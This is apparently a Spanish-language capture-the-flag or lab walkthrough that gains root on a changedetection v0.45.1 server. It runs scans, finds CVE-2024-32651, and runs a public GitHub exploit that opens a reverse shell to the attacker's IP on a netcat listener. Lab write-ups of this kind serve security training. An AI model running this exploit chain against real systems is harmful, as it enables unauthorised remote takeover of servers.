MAQUINA DETECTION (WEB 'changedetection' port 5000 + VULN RCE 'changedetection RCE')
Realice un escaneo de puertos con NMAP.
nmap -A --min-rate 3000 -Pn 192.168.163.97 -oN Basicscan.txt

Puertos abiertos 22 ssh y 5000 http
Puerto 5000 http >> http-title "Change Detection" .
Use whatweb para ver las tecnologías de la web.
whatweb
http://192.168.163.97:5000

Pase a hacer un reconocimiento de la pagina web.

Con feroxbuster realice una búsqueda de directorios ocultos.


En su lado derecho puedo ver una versión de la aplicación web changedetecion > v 0.45.1

Con la herramienta searchsploit encontré un exploit para esta versión.
searchsploit 'change detection'

Al verificar que tiene una vulnerabilidad RCE, busque en google otro exploit en github encontrando lo siguiente.
https://github.com/s0ck3t-s3c/CVE-2024-32651-changedetection-RCE.git

Utilice la prueba de concepto de este exploit para poder ejecutarlo. En otra terminal me puse a la escucha con netcat.
python3 exploit.py --url
http://192.168.163.97:5000
--port 80 --ip 192.168.45.159

Una vez que ejecute el exploit logre el acceso remoto a la maquina como usuario root.

Last updated